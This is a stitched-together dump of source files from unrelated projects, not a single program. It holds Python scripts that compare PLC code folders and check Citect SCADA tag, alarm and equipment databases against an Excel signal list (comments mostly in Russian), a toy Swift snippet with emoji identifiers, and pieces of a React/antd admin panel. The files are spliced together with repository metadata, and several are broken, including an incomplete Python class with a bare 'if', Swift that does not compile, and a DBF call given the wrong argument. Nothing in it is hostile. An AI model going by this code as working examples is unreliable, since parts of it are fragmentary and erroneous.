list_of_blocks = []
for x in f:
if "_block" in x:
list_of_blocks.append(x.split("_block")[0])
f.close()
print(list_of_blocks)
print(list_of_blocks.__len__())
f = open(outputfile, "w")
for row in list_of_blocks:
f.write(row+'\n')
<file_sep>import os
from os import listdir
from os.path import isfile, join
def diff(list1, list2):
return (list(list(set(list1)-set(list2)) + list(set(list2)-set(list1))))
directory1 = r'C:\Users\1\Desktop\PLC code\2020_08_24 13_56'
dirlist1 = [x[0] for x in os.walk(directory1)]
directory2 = r'C:\Users\1\Desktop\PLC code\2020_08_24 17_22'
dirlist2 = [x[0] for x in os.walk(directory2)]
# difdirrlist1 = list(map(lambda x: x.replace(directory1, ""), dirlist1))
# difdirrlist2 = list(map(lambda x: x.replace(directory2, ""), dirlist2))
# print(diff(difdirrlist1, difdirrlist2))
allfiles1 = []
allfiles2 = []
difference = []
for folder in dirlist1:
onlyfiles = [f for f in listdir(folder) if isfile(join(folder, f))]
for n, i in enumerate(onlyfiles):
onlyfiles[n] = folder + '\\' + onlyfiles[n]
allfiles1.append(onlyfiles)
for folder in dirlist2:
onlyfiles = [f for f in listdir(folder) if isfile(join(folder, f))]
for n, i in enumerate(onlyfiles):
onlyfiles[n] = folder + '\\' + onlyfiles[n]
allfiles2.append(onlyfiles)
for file in allfiles1:
try:
with open(file[0], 'r') as f1:
next(f1)
text1 = ''
for line in f1:
text1 = text1 + line
except FileNotFoundError:
print(f'Нет файла {file[0]}')
try:
with open(file[0].replace(directory1, directory2), 'r') as f2:
next(f2)
text2 = ''
for line in f2:
text2 = text2 + line
except (FileNotFoundError, StopIteration) as e:
print(f'Нет файла {file[0].replace(directory1, directory2)}')
if text1 != text2:
difference.append(file[0])
print(f'Разница между версий в файлах: {difference}')
<file_sep>import pandas as pd
import re
inputfile = r'C:\Users\1\Desktop\input_AI\file.txt'
outputfile = r'C:\Users\1\Desktop\input_AI\file.xlsx'
f = open(inputfile, 'r')
name = 'fail'
EU = 'fail'
min_scale = 'fail'
max_scale = 'fail'
index = 0
df = pd.DataFrame(columns=['Наименов_0', 'Min_Scale', 'Max_Scale', 'EU'])
for line in f:
if 'UDT :=' in line:
if name != 'fail':
df.at[index, 'Наименов_0'] = name
df.at[index, 'Min_Scale'] = min_scale
df.at[index, 'Max_Scale'] = max_scale
df.at[index, 'EU'] = EU
index = index + 1
name = line.split('_block')[0].split('(')[0].replace(',', '').replace(';', '').replace(')', '').strip()
if 'Scale_min' in line:
min_scale = line.split(':=')[1].split('(')[0].replace(',', '').replace(';', '').replace(')', '').strip()
if 'Scale_max' in line:
max_scale = line.split(':=')[1].split('(')[0].replace(',', '').replace(';', '').replace(')', '').strip()
if 'eдиницы измерения параметра' in line:
try:
EU = re.search(r'\[.{1,10}\]', line.split('eдиницы измерения параметра')[1]).group(0)[1:-1].strip()
except AttributeError:
pass
df.at[index, 'Наименов_0'] = name
df.at[index, 'Min_Scale'] = min_scale
df.at[index, 'Max_Scale'] = max_scale
df.at[index, 'EU'] = EU
index = index + 1
fyv = df.loc[df['Наименов_0'] == "Y0A01010_0"]["EU"]
df.to_excel(outputfile)
f.close()
<file_sep>import glob
import os
folder = r'C:\Users\rangin\Desktop\MS_tags\ '
folderobj = r'C:\Users\rangin\Desktop\MS_objects\ '
files = glob.glob(os.path.join(folder[:-1], '*.txt'))
for file in files:
inputfile = open(file, 'r')
outputfile = open(folderobj[:-1] + file.split("\\")[-1], 'w+')
inputlist = []
ilist = []
forbidden_combos = ('ST01', 'RG01', 'AM01', 'ST02', 'ST03', 'RJ01', 'AM02', 'AM03')
forbidden_combos = tuple([x+'\n' for x in forbidden_combos])
for line in inputfile:
ilist.append(line)
for line in ilist:
if line.split('_')[:2] in inputlist:
continue
else:
try:
if not line.split('_')[1].endswith(forbidden_combos):
inputlist.append(line.split('_')[:2])
except IndexError:
continue
for line in inputlist:
if line.__len__() > 1:
outputfile.write(line[0] + '_' + line[1] + '\n')
else:
outputfile.write(line[0] + '\n')
<file_sep>import pandas as pd
class Valve:
def __init__(self, name):
self.name = name # instance variable unique to each instance
OP = ""
CL = ""
Remote = ""
Local = ""
Power_En = ""
Auto_Mode = ""
Man_Mode = ""
CMD_OP_GCHU = ""
CMD_CL_GCHU = ""
CMD_OP_RCHU = ""
CMD_CL_RCHU = ""
CMD_STP_RCHU = ""
CMD_STP_GCHU = ""
vhodblokatocode = {"OP":"",
"CL":"",
"Local":"",
"Remoute":"",
"Power_En":"",
"CMD_OP_GCHU":"",
"CMD_CL_GCHU":"",
"CMD_STP_GCHU":"",
"CMD_OP_RCHU":"",
"CMD_CL_RCHU":"",
"CMD_STP_RCHU":"",
"Auto_mode":"",
"Man_mode": "",
}
def fill(self, dataframe):
for index, row in dataframe:
if
df = pd.DataFrame([["Valve", "KIS336.1 A036 1", "Local"],
["Valve", "KIS336.1 A036 2", "Remoute"],
["Valve", "KIS336.1 A036 3", "OP"],
["Valve", "KIS336.1 A036 4", "CL"],
["Valve", "KIS336.1 A036 5", "Power_En"],
["Valve", "KIS336.1 A036 6", "Auto_mode"],
["Valve", "KIS336.1 A036 7", "Man_mode"],
["Valve", "KIS336.1 A036 8", "CMD_OP_GCHU"]],
columns=['Type', 'NeededData', 'Vhod bloka'])
print(0)
VC01S01 = Valve("Valve")
VC01S01.fill(df)
<file_sep>import pandas as pd
def importdf(filename, sheet):
dataframe = pd.read_excel(filename, sheet_name=sheet)
return dataframe
inputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\Копия WORK_10998_from 19дек 13-40+Сводная.xlsx'
outputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\WORK_10998_from 14авг 13-00+Сводная.xlsx'
sheetname = 'Лист1'
df = importdf(inputfile, sheetname)
df['Номер элемента в массиве пересылки'] = ''
df.sort_values(by=['Код'])
indexes = {
"КИС320.1": 0,
"КИС336.1": 0,
"КИС336.2": 0,
"КИС336.3": 0,
"КИС420.1": 0,
"КИС420.2": 0,
"КИС420.3": 0,
"КИС420.4": 0,
"КИС420.5": 0,
"КИС420.6": 0,
"КИС420.7": 0}
for index, row in df.iterrows():
if row['Номер КИС'] != row['Номер КИС к родителю'] and "КИС" in str(row['Номер КИС к родителю']):
df.at[index, 'Номер элемента в массиве пересылки'] = indexes[row['Номер КИС к родителю']]
indexes[row['Номер КИС к родителю']] = indexes[row['Номер КИС к родителю']] + 1
df.to_excel(inputfile, sheet_name=sheetname)
print(indexes)
<file_sep>import difflib
file1 = open(r'C:\Users\1\Desktop\PLC code\2020_08_19 12_11(2)\КИС320.1\AI КИС320.1\AI КИС320.1.txt', 'r')
file2 = open(r'C:\Users\1\Desktop\PLC code\2020_08_19 11_41\КИС320.1\!КИС320.1Массив пересылок.txt', 'r')
diff = difflib.ndiff(file1.readlines()[2:], file2.readlines()[2:])
delta = ''.join(x for x in diff)
# print(delta)
print(difflib.SequenceMatcher(None, file1.readlines()[2:], file2.readlines()[2:]).ratio())
file2.close()
file1.close()
<file_sep># ! /usr/bin/python
# https://www.python.org/download/releases/2.7.6
# http://sourceforge.net/projects/dbfpy/files/dbfpy/2.2.5/
# import Tkinter, Tkconstants, tkFileDialog
import sys, os
import re, glob
# from dbfpy import dbf
from dbfread import DBF
import string
def GetProjectDirectory():
# Tkinter.Tk().withdraw() # we don't want a full GUI, so keep the root window from appearing
# folder = tkFileDialog.askdirectory() # show an "Open" dialog box and return the path to the selected file
folder = r'C:\ProgramData\Schneider Electric\Citect SCADA 2016\User\Current_2021_05_26'
if len(folder) < 3:
raise Exception("No directory specified in GUI")
return folder
def getAlarms(folder):
# Get Alarms
# anaalm.dbf
# digalm.dbf
# hardalm.dbf
# hresalm.dbf
# advalm.dbf
# *alm.dbf
alarms = dict()
# pat = re.compile(r'^(ana|dig|hard|hres|adv)alm\.dbf$',re.IGNORECASE)
# for item in os.listdir(folder):
# if pat.match(item):
# alarmfiles.append(item)
alarmfiles = glob.glob(os.path.join(folder, '*alm.dbf'))
print("Found {0} alarm files.\n".format(len(alarmfiles)))
for almType in alarmfiles:
# db = dbf.Dbf(almType, new=False)
db = DBF(alarms, encoding='cp1251', load=True)
alarms[almType] = []
for rec in db:
alarms[almType].append(rec.asDict())
print("Found {0} alarm{2} in {1}".format(len(alarms[almType]), almType, 's' if (len(alarms[almType]) == 0 or len(alarms[almType]) > 1) else ''))
return alarms
def getTags(folder):
# Get Tags
# variable.dbf
tags = list()
tagfiles = glob.glob(os.path.join(folder, 'variable.dbf'))
print("Found {0} tag files.\n".format(len(tagfiles)))
for tagfile in tagfiles:
# db = dbf.Dbf(tagfile, new=False)
db = DBF(tagfile, encoding='cp1251', load=True)
for rec in db:
# tags.append(rec.asDict())
tags.append(rec)
print("Found {0} tag{2} in {1}".format(len(tags), tagfile, 's' if (len(tags) == 0 or len(tags) > 1) else ''))
return tags
def listPages(folder, includePath=True):
# *.rdb files whose name starts with an underscore don't seem to directly map to pages
# PageMenu.RDB and !Startup.RDB don't seem to map to pages in Citect
pages = list()
files = glob.glob(os.path.join(folder, 'MS*.rdb'))
for page in files:
# If the first character of the filename starts with an underscore don't add it to the list of pages
if os.path.basename(page)[0] == '_':
continue
if includePath:
pages.append(page)
else:
# print os.path.basename(page)
pages.append(os.path.basename(page))
return pages
# http://stackoverflow.com/a/17197027
def strings(filename, min=4):
import string
result = ""
with open(filename, "rb") as f:
for c in str(f.read()):
if c in string.printable:
result += c
continue
# if len(result) >= min:
# yield result
# result = ""
return result
# http://stackoverflow.com/a/600612
def mkdir_p(path):
import os, errno
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def getCachePage(pagePath):
mkdir_p('cache') # make the directory if it doesn't exist
cachefile = os.path.join('.', 'cache', os.path.basename(pagePath))
cachefile = os.path.abspath(cachefile)
# check if the page is already cached # if not cache it
# if not os.path.isfile(cachefile):
with open(cachefile, 'w+') as f:
for line in list(strings(pagePath)):
f.write(line)
# return the page
with open(cachefile) as f:
lines = f.readlines()
return ''.join(lines)
def isTagInPage(tag, pagePath):
# text = getCachePage(pagePath)
text = str(strings(pagePath))
return tag in text
if __name__ == '__main__':
folder = GetProjectDirectory()
# print getAlarms(folder)
# getTags(folder)
pages = listPages(folder)
tags = getTags(folder)
# page = "C:/Users/bjbourque/Desktop/citect_project_analyzer/SAPPI_FINAL_2008_BB\EQ_IFConv.RDB"
ms_tags_path = r'C:\Users\rangin\Desktop\MS_tags\ '
# print isTagInPage('IF401ORecvRetract', page)
for page in pages:
print("Tags on page '{0}'".format(os.path.basename(page)))
result = ""
with open(page, "rb") as f:
for c in str(f.read()):
if c in string.printable:
result += c
continue
file = open(ms_tags_path[:-1] + format(os.path.basename(page)) + r'.txt', 'w+')
for tag in tags:
if tag['NAME'] in result:
print(tag['NAME'])
file.write(tag['NAME'] + '\n')
# MS_tags_list[page.split('MS')[1][:2]] = temp_dict
file.close()
input("Press Enter to continue...")
# sys.exit(0)
# for page in pages:
# print page
# sys.exit(0)<file_sep>import pandas as pd
from dbfread import DBF
def readdbftolistofdict(name):
equip = DBF(name, encoding='cp1251', load=True)
outputlist = []
for record in equip:
recorddict = {}
for key, value in record.items():
recorddict[key] = value
if recorddict['IODEVICE'] == 'OFSDevice':
outputlist.append(recorddict)
return outputlist
# Формирование списка словарей equip, который содержит данные из ППО СКАДА
DBFFile = r'C:\ProgramData\Schneider Electric\Citect SCADA 2016\User\Current_20_03_16\equip.dbf'
equip = readdbftolistofdict(name=DBFFile)
dbfequip = pd.DataFrame(equip[0], index=[0])
for record in equip[1:]:
# print(record['NAME'])
dbfequip = dbfequip.append(record, ignore_index=True)
# Формирование DataFrame с данными из excel базы данных
inputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\Старое\Бэкап от 29062020 Ревизия + WORK_10998_from 19дек 13-40+Сводная.xlsx'
df = pd.read_excel(inputfile, sheet_name='Лист1')
naimen_0 = df["Наименов_0"].unique().tolist()
naimen_0 = [x for x in naimen_0 if str(x) != 'nan'] # Убираем NaN
# Словари, ключи которых - название в базе Excel, а значение - название в базе ППО СКАДА, для составления соответствия между записями
type_aliases = {'AI': 'AI_udt',
'Сигн AI': 'AI_sign_udt',
'вентилятор': 'vent_udt',
'Клапан': 'Valve_udt',
'kid': 'Valve_kid_udt',
'AI_complicate': 'AI_cmp_udt',
'Signalizator': 'Sign_udt',
'Насос': 'Pump_udt',
'el_nagr': 'el_nagr_udt',
'flt_rulon': 'flt_rulon_udt',
'мешалка': 'mesh_udt',
'Шибер': 'shiber_udt'}
eu_aliases = {'Гр.С': 'Гр.С',
r'куб.м/ч': r'куб.м/ч',
'МПа': 'мПа',
'мПа': 'мПа',
'град.С': 'град.С',
'мм': 'мм',
r'М3/Ч': r'куб.м/час',
'NO_INF': 'отс инф',
'%': '%',
r'г/л': r'г/л',
'кПа': 'кПа',
'КПа': 'кПа',
'мм рт.ст': 'мм рт.ст.',
r'КГС/СМ2': r'КГС/СМ2',
'м': 'м',
r'м/с2': 'отс инф',
r'кг/ч': r'кг/ч',
r'л/ч': r'л/ч',
r'моль/л': r'моль/л',
'pH': 'pH',
r'мкСм/см': r'мкСм/см',
r'мг/куб.м': r'мг/куб.м',
r'мг/л': 'мг/л'}
object_name_flag = []
for name in naimen_0:
KIS = df.loc[df['Наименов_0'] == name]["Номер КИС к родителю"].values[0]
object_type = df.loc[df['Наименов_0'] == name]["Тип объекта"].values[0]
try:
KIS_equip = dbfequip.loc[dbfequip['TAGPREFIX'] == name]["CUSTOM3"].values[0]
except IndexError:
print(f'В DBF отсутствует переменная {name}')
continue
object_type_equip = dbfequip.loc[dbfequip['TAGPREFIX'] == name]["TYPE"].values[0]
if str(KIS)[3:].replace('.', '_') != KIS_equip:
print(f'Номер КИС к родителю и CUSTOM3 не совпадают для объекта {name}, Excel - {KIS}, DBF - {KIS_equip}')
try:
if type_aliases[str(object_type).strip()].lower() != object_type_equip.lower():
print(f'Тип объекта и TYPE не совпадают для объекта {name}, Excel - {object_type}, DBF - {object_type_equip}')
except KeyError:
pass
if object_type == 'AI' or object_type == 'Сигн AI':
object_name = name.split('_')[0]
if object_name in object_name_flag:
pass
else:
object_name_flag.append(object_name)
# Проверка правильности заполнения поля CUSTOM1 (Количество каналов сигнала)
quantity = sum(object_name in s for s in naimen_0)
custom1 = dbfequip.loc[dbfequip['TAGPREFIX'] == name]["CUSTOM1"].values[0]
if custom1 != '':
if custom1 != str(quantity):
print(f'Поле с количеством каналов в ППО СКАДА заполнено не верно для объекта {name}, - тип - {object_type}, CUSTOM1 - {custom1}, количество каналов объекта - {quantity}')
else:
print(f'Поле с количеством каналов в ППО СКАДА не заполнено для объекта {name}, тип - {object_type}, количество каналов объекта - {quantity}')
try:
custom6 = dbfequip.loc[dbfequip['TAGPREFIX'] == name]["CUSTOM6"].values[0]
custom7 = dbfequip.loc[dbfequip['TAGPREFIX'] == name]["CUSTOM7"].values[0]
custom8 = dbfequip.loc[dbfequip['TAGPREFIX'] == name]["CUSTOM8"].values[0]
scale_max = df.loc[df['Наименов_0'] == name][df['Тип сигнала'] == 'А']["верхний предел парам"].values[0]
scale_min = df.loc[df['Наименов_0'] == name][df['Тип сигнала'] == 'А']["нижн предел парам"].values[0]
eng_units = df.loc[df['Наименов_0'] == name][df['Тип сигнала'] == 'А']["Единицы измер параметра"].values[0]
if custom8 == 'КПа':
print(f'В объекте {name} изменить единицы измерения с "КПа" на "кПа"')
if custom8 == 'мПа':
print(f'В объекте {name} изменить единицы измерения с "мПа" на "МПа"')
if custom6 == '' or custom7 == '' or custom8 == '':
print(f'Незаполненные поля в ППО СКАДА для объекта {name} - CUSTOM6 = {custom6}, по базе - {scale_max}, CUSTOM7 = {custom7}, по базе - {scale_min}, CUSTOM8 = {custom8}, по базе - {eng_units}')
else:
# Проверка правильности заполнения поля CUSTOM6 (верхнее значение диапазона)
if str(scale_max) == 'отс инф':
print(f'Верхний предел параметра для объекта {name} не задано в базе Excel - {scale_max} , в ППО СКАДА - "{custom6}"')
else:
if str(scale_max).replace(',', '.') != str(custom6):
print(f'Верхний предел параметра для объекта {name} отличается в базе Excel - {scale_max} и в ППО СКАДА - "{custom6}"')
# Проверка правильности заполнения поля CUSTOM7 (нижнее значение диапазона)
if str(scale_min) == 'отс инф':
print(f'Нижний предел параметра для объекта {name} не задано в базе Excel - {scale_min} , в ППО СКАДА - "{custom7}"')
else:
if str(scale_min).replace(',', '.') != str(custom7):
print(f'Нижний предел параметра для объекта {name} отличается в базе Excel - {scale_min} и в ППО СКАДА - "{custom7}"')
# Проверка правильности заполнения поля CUSTOM8 (единицы измерения параметра)
if str(eng_units) == 'отс инф':
print(f'Единицы измерения для объекта {name} не задано в базе Excel - {eng_units} , в ППО СКАДА - {custom8}')
else:
if str(eng_units).lower() != eu_aliases[str(custom8)].lower():
print(f'Единицы измерения для объекта {name} отличается в базе Excel - {eng_units} и в ППО СКАДА - {custom8}')
except IndexError:
print(f'В объекте {name} типа {object_type} отсутствует аналоговый сигнал')
<file_sep>import glob
import os
import pandas as pd
import numpy as np
# Cross-checks which mnemonic schemes (MS) each object is actually bound to
# (one *.txt export file per scheme) against the "MS" column of the summary
# Excel workbook, and prints every mismatch.
inputfile = r'C:\Users\rangin\Desktop\MS_objects\Сводная по мнемосхемам.xlsx'
# Trailing space is stripped via objfile[:-1] below: a raw string cannot end
# with a backslash, hence this workaround.
objfile = r'C:\Users\rangin\Desktop\MS_objects\ '
df = pd.read_excel(inputfile, sheet_name='Данные')
df['MS_fact'] = ''
naimen_0 = df["Наименов_0"].unique().tolist()
naimen_0 = [x for x in naimen_0 if str(x) != 'nan']  # drop NaN entries
# One .txt file per mnemonic scheme; each line is an object name bound to it.
files = glob.glob(os.path.join(objfile[:-1], '*.txt'))
for file in files:
    f = open(file, 'r')
    f1 = f.readlines()
    for i in range(0, len(f1)):
        f1[i] = f1[i].replace('\n', '')
    # Append the first 4 chars of the file name (e.g. "MS01") to the MS_fact
    # cell of every row whose object name matches this line.
    for row in f1:
        df["MS_fact"] = np.where(df['Наименов_0'] == row, df["MS_fact"] + format(os.path.basename(file))[:4], df["MS_fact"])
    f.close()
for name in naimen_0:
    # Actual bindings: "MS01MS03" -> "0103", then re-joined as "01+03+".
    ms_fact = str(df.loc[df['Наименов_0'] == name]["MS_fact"].values[0]).replace('MS', '')
    m = ''
    # NOTE(review): loop variable shadows the builtin `slice` — harmless here.
    for slice in [ms_fact[i:i+2] for i in range(0, len(ms_fact), 2)]:
        m = m + slice + '+'
    # Expected binding from the summary sheet, digits only.
    mnem = str(df.loc[df['Наименов_0'] == name]["MS"].values[0]).replace('МС', '').replace('MC', '').replace('nan', '')
    ms_fact = m
    # NOTE(review): when mnem == '' the condition below is always False
    # ('' is a substring of every string), so the mnem == '' branch further
    # down is unreachable — confirm intended behavior.
    if mnem not in ms_fact:
        if ms_fact == '':
            print(f'Объект {name} по сводной таблице мнемосхем находится на МС{mnem}, по факту не привязан ({ms_fact})')
        else:
            if mnem == '':
                print(f'Объект {name} по сводной таблице мнемосхем не привязан к мнемосхема ({mnem}), по факту привязан в {ms_fact}')
            else:
                print(f'В объекте {name} мнемосхема по таблице {mnem} и по факту {ms_fact} отличается ')
| 0bc5644f8da93f3ef671671d88b467e939c8bebe | [
"Python"
] | 17 | Python | amaralex1/Citect_SCADA_utiliities | 0388793e84c4add7b20119bbd6f4e40d7371cd6b | 95db89b5c070b4abd2631927454ee36f2ccd9b85 |
refs/heads/master | <file_sep>#!/usr/bin/env python
# -*- coding: utf-8 -*-
// NOTE(review): toy demo using emoji identifiers (legal in Swift).
// The method below declares no return type yet returns a value, which
// would not compile on current Swift toolchains — documentation only.
class 🍙🍙🍙{
    // Adds its two Int arguments (missing `-> Int` in the original).
    func 🐶🐶(😇:Int, 😙: Int){
        return 😙 + 😇
    }
}
var 🍜 = 3
var 🍝 = 🍜 + 5  // 8
var 🍙 = 🍙🍙🍙()
println(🍙.🐶🐶(🍜, 😙:🍝 )) | 3dfc258daee4f6f978aaeca20574a55dd4afa2b4 | [
"Python"
] | 1 | Python | maruhachi/emoji-code | bb4edac0084430646723e0c7f7b9a5688beff61a | 9e337f4beab7a5b0d14950c68d6c75d4b23912bf |
refs/heads/master | <file_sep>import React from 'react';
import { Route, Switch, BrowserRouter as Router } from 'react-router-dom';
import AuthComponent from './component/AuthComponent';
// import AuthRoute from './component/AuthRoute';
import Login from './container/Login';
import Main from './layout/Main';
const NoMatch = (props) => (
<div>nomatch</div>
)
// Top-level router: /login is public, everything else goes through
// AuthComponent which redirects unauthenticated users to /login and
// renders the Main layout otherwise.
export default class Routes extends React.Component {
  render() {
    return (
      <Router>
        <Switch>
          <Route path="/login" component={Login} />
          <AuthComponent path="/" redirectPath="/login" component={Main} noMatch={NoMatch} />
          {/* <Route render={() => <AuthRoute Layout={Main} />} /> */}
        </Switch>
      </Router>
    );
  }
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Card, Form, Input, Select, Button, message } from 'antd';
import EnhanceTitle from '../../component/EnhanceTitle';
import { formItemLayout2, SKY_TYPE } from '../../utils/constant';
import { getSkylightById, updateSkylight } from '../../action/skylight';
import Uploader from '../../component/Uploader';
const FormItem = Form.Item;
const { Option } = Select;
const { TextArea } = Input;
@connect(({ skylight }) => ({
skylightDetail: skylight.skylightDetail
}), {
getSkylightById
})
@Form.create()
export default class SkylightEdit extends React.PureComponent {
componentDidMount() {
const { match } = this.props;
const { params: { id } } = match;
this.props.getSkylightById(id);
}
handleSubmit= (e) => {
e.preventDefault();
this.props.form.validateFields(async (err, values) => {
if (!err) {
const { match } = this.props;
const { params: { id } } = match;
const result = await updateSkylight({ id, ...values });
if (result && result.code === 0) {
message.success('更新天窗成功!1s后跳转天窗列表页面');
this.timer = setTimeout(() => {
this.props.history.push('/skylight/list');
}, 1000)
}
}
});
}
render() {
const { getFieldDecorator } = this.props.form;
const { skylightDetail = {} } = this.props;
return (
<div className="page-detail">
<Form onSubmit={this.handleSubmit}>
<Card bordered={false}>
<EnhanceTitle title="基本信息" />
<FormItem {...formItemLayout2} label="天窗ID">
{getFieldDecorator('skyId', {
initialValue: skylightDetail.skyId,
rules: [{
required: true, message: '请输入天窗ID',
}],
})(
<Input placeholder="请输入天窗ID" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="天窗类型">
{getFieldDecorator('skyType', {
initialValue: skylightDetail.skyType,
rules: [{
required: true, message: '请选择天窗类型',
}],
})(
<Select allowClear placeholder="请选择天窗类型">
{Object.keys(SKY_TYPE).map(item => (
<Option key={item} value={item}>{SKY_TYPE[item]}</Option>
))}
</Select>
)}
</FormItem>
<FormItem {...formItemLayout2} label="天窗标题">
{getFieldDecorator('skyTitle', {
initialValue: skylightDetail.skyTitle,
rules: [{
required: true, message: '请输入天窗标题',
}],
})(
<Input placeholder="请输入天窗标题" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="天窗描述">
{getFieldDecorator('description', {
initialValue: skylightDetail.description,
rules: [{
required: true, message: '请输入天窗描述',
}],
})(
<TextArea rows={4} placeholder="请输入天窗描述" />
)}
</FormItem>
<FormItem {...formItemLayout2} label="天窗图片">
{getFieldDecorator('skyContent', {
initialValue: [skylightDetail.skyContent],
rules: [{
required: true, message: '请添加天窗图片',
}],
})(
<Uploader type="banner" max={1} />
)}
</FormItem>
</Card>
<div>
<Button style={{ width: '120px', marginRight: '20px' }} type="primary" htmlType="submit">提交</Button>
<Button style={{ width: '120px' }}>清空</Button>
</div>
</Form>
</div>
)
}
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Layout, Menu, Icon, Breadcrumb, message, Dropdown, Avatar } from 'antd';
import { Route, Link, Redirect } from 'react-router-dom';
import { authUserLogin, authUserLogout, getUserInfo } from '../action/auth';
import MenuData from '../common/menu';
import routerData from '../common/router';
import './index.css';
const { Header, Content, Footer, Sider } = Layout;
const SubMenu = Menu.SubMenu;
// url -> display name, built from the static router table; used to render
// the breadcrumb trail in render().
const breadcrumbNameMap = {};
Object.keys(routerData).forEach(item => {
  breadcrumbNameMap[item] = routerData[item].name
});
// Paths that should immediately redirect to their first child route.
const redirectData = Object.keys(routerData).filter(item => routerData[item].redirect);
// Resolve the default (first) child route under a top-level menu entry.
// Falls back to "/<parentPath>" when the path is not a known menu item.
function getFirstChildPath(parentPath) {
  const matched = MenuData.find(entry => entry.path === parentPath);
  if (!matched) {
    return `/${parentPath}`;
  }
  return `/${parentPath}/${matched.children[0].path}`;
}
// Flat list of every "/parent/child" menu path; used in render() to decide
// whether the current location is a selectable menu entry.
let menuPaths = [];
MenuData.forEach(parent => {
  if (parent.children) {
    parent.children.forEach(child => {
      menuPaths.push(`/${parent.path}/${child.path}`)
    })
  }
});
// Authenticated application shell: collapsible side menu, top header with a
// user dropdown (logout / password reset), breadcrumb trail and the routed
// content area. Fetches the current user profile on mount.
@connect(({ auth }) => ({
  userInfo: auth.userInfo,
}), {
  authUserLogin,
  authUserLogout,
  getUserInfo,
})
export default class Main extends React.PureComponent {
  state = {
    collapsed: false,  // whether the sider is collapsed
    // NOTE(review): selectedKeys/openKeys/openChangeKes below appear unused
    // (render() computes its own selection; "openChangeKes" looks like a
    // typo of openChangeKeys) — verify before removing.
    selectedKeys: '1',
    openKeys: [],
    openChangeKes: []
  };
  async componentDidMount() {
    await this.props.getUserInfo();
  }
  // Toggle the collapsed state of the side menu.
  toggle = () => {
    this.setState({
      collapsed: !this.state.collapsed,
    });
  }
  // Handles clicks in the user dropdown: logout navigates to /login on
  // success; reset navigates to the password-reset page.
  onMenuClick = async ({ key }) => {
    const { history } = this.props;
    if (key === 'logout') {
      try {
        const resp = await this.props.authUserLogout();
        if (resp) {
          history.push('/login');
        }
      } catch (error) {
        message.error(error.msg);
      }
    } else if (key === 'reset') {
      history.push('/admin/reset');
    }
  };
  render() {
    const { history, location } = this.props;
    // Highlight the current menu item; fall back to the section's first
    // child when the current path is not itself a menu entry.
    let selectedKeys = [location.pathname];
    if (!menuPaths.includes(location.pathname)) {
      selectedKeys = [getFirstChildPath(location.pathname.split('/')[1])];
    }
    const pathSnippet = location.pathname.split('/')[1];
    const childPath = getFirstChildPath(pathSnippet);
    const { collapsed } = this.state;
    const pathSnippets = location.pathname.split('/').filter(i => i);
    // Drop path segments that have no mapped route name.
    const treatedPathSnippets = pathSnippets.filter((_, index) => {
      const url = `/${pathSnippets.slice(0, index + 1).join('/')}`;
      return breadcrumbNameMap[url];
    });
    // Breadcrumb items: the last segment is plain text, ancestors are links.
    const extraBreadcrumbItems = treatedPathSnippets.map((_, index) => {
      const url = `/${pathSnippets.slice(0, index + 1).join('/')}`;
      return (
        <Breadcrumb.Item key={url}>
          {
            treatedPathSnippets.length === index + 1 ? (
              <span>{breadcrumbNameMap[url]}</span>
            ) : (
              <Link to={url}>{breadcrumbNameMap[url]}</Link>
            )
          }
        </Breadcrumb.Item>
      );
    });
    const breadcrumbItems = [(
      <Breadcrumb.Item key="home">
        <Link to="/">首页</Link>
      </Breadcrumb.Item>
    )].concat(extraBreadcrumbItems);
    const menu = (
      <Menu onClick={this.onMenuClick} className="menu" placement="bottomRight">
        {/* <Menu.Item><Icon type="user" />个人中心</Menu.Item>
        <Menu.Item><Icon type="setting" />设置</Menu.Item> */}
        <Menu.Divider />
        <Menu.Item key="logout"><Icon type="logout" />退出登录</Menu.Item>
        <Menu.Item key="reset"><Icon type="setting" />修改密码</Menu.Item>
      </Menu>
    );
    const { userInfo = {} } = this.props;
    const { sysUser = {} } = userInfo;
    return (
      <Layout className="main-layout" style={{ minHeight: '100vh' }}>
        <Sider
          trigger={null}
          collapsible
          collapsed={collapsed}
        >
          <div className="logo">
            <Icon type="appstore" theme="outlined" />
            <span>快易布管理系统</span>
          </div>
          {/* NOTE(review): SubMenu below passes this.onTitleClick, which is
              not defined on this class — confirm whether it can be dropped. */}
          <Menu theme="dark" defaultOpenKeys={[pathSnippet]} selectedKeys={selectedKeys} mode="inline">
            {
              MenuData.map(item => (
                <SubMenu
                  key={item.path}
                  title={<span><Icon type={item.icon} /><span>{item.name}</span></span>}
                  onTitleClick={this.onTitleClick}
                >
                  {
                    item.children.map(child => (
                      <Menu.Item key={`/${item.path}/${child.path}`} onClick={() => history.push(`/${item.path}/${child.path}`)}>{child.name}</Menu.Item>
                    ))
                  }
                </SubMenu>
              ))
            }
          </Menu>
        </Sider>
        <Layout>
          <Header className="top-header">
            <Icon
              className="trigger"
              type={this.state.collapsed ? 'menu-unfold' : 'menu-fold'}
              onClick={this.toggle}
            />
            <div className="user-drop">
              <Dropdown overlay={menu}>
                <span className="action account">
                  <Avatar size="small" src="https://gw.alipayobjects.com/zos/rmsportal/BiazfanxmamNRoxxVxka.png" />
                  <span className="username">{sysUser.username}</span>
                </span>
              </Dropdown>
            </div>
          </Header>
          <Content>
            <Breadcrumb style={{ margin: '0 0px 16px 0', background: '#ffffff', padding: '8px 16px' }}>
              {breadcrumbItems}
            </Breadcrumb>
            <div style={{ margin: '0 16px' }}>
              {redirectData.includes(location.pathname) && <Redirect from={pathSnippet} to={childPath} />}
              {
                Object.keys(routerData).map(item => (
                  <Route key={item} exact={routerData[item].exact} path={item} component={routerData[item].component} />
                ))
              }
            </div>
          </Content>
          <Footer style={{ textAlign: 'center' }}>
            备案号:粤ICP备18103794号-1
          </Footer>
        </Layout>
      </Layout>
    );
  }
}
<file_sep>import React from 'react';
import { Form, Input, Select, Button } from 'antd';
import { UNIT_VALUES } from '../../utils/constant';
const FormItem = Form.Item;
const Option = Select.Option;
const formItemLayout = {
labelCol: {
xs: { span: 24 },
sm: { span: 6 },
},
